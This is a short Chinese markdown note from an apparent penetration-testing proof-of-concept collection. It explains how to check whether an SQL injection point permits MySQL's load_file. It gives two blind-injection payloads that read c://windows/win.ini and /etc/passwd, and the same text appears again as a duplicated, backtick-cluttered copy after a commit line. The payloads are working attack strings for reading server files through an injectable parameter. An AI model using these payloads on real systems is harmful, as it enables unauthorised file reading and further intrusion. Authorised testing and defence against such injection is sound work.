Penetration_Testing_POC/快速判断sql注入点是否支持load_file.md

在sql注入点中,如果一个注入点支持load_file函数来读取文件的话,无疑对我们进行渗透来说是一个好消息  

分享一下一条语句检测是否支持load_file读取文件  


Windows 注入点判断文件是否存在  

```
1 and 1=if(ascii(mid(load_file('c://windows/win.ini'),1,1))>0,1,2)
```

Linux  

```
1 and 1=if(ascii(mid(load_file('/etc/passwd'),1,1))>0,1,2) 
```
add 79款 Netgear 路由器遭远程接管0day&代码审计之DTCMS_V5.0后台漏洞两枚&快速判断sql注入点是否支持load_file 2020-06-19 11:32:47 +08:00			`在sql注入点中,如果一个注入点支持load_file函数来读取文件的话,无疑对我们进行渗透来说是一个好消息`

			`分享一下一条语句检测是否支持load_file读取文件`


			`Windows 注入点判断文件是否存在`

			```
			`1 and 1=if(ascii(mid(load_file('c://windows/win.ini'),1,1))>0,1,2)`
			```

			`Linux`

			```
			`1 and 1=if(ascii(mid(load_file('/etc/passwd'),1,1))>0,1,2)`
			```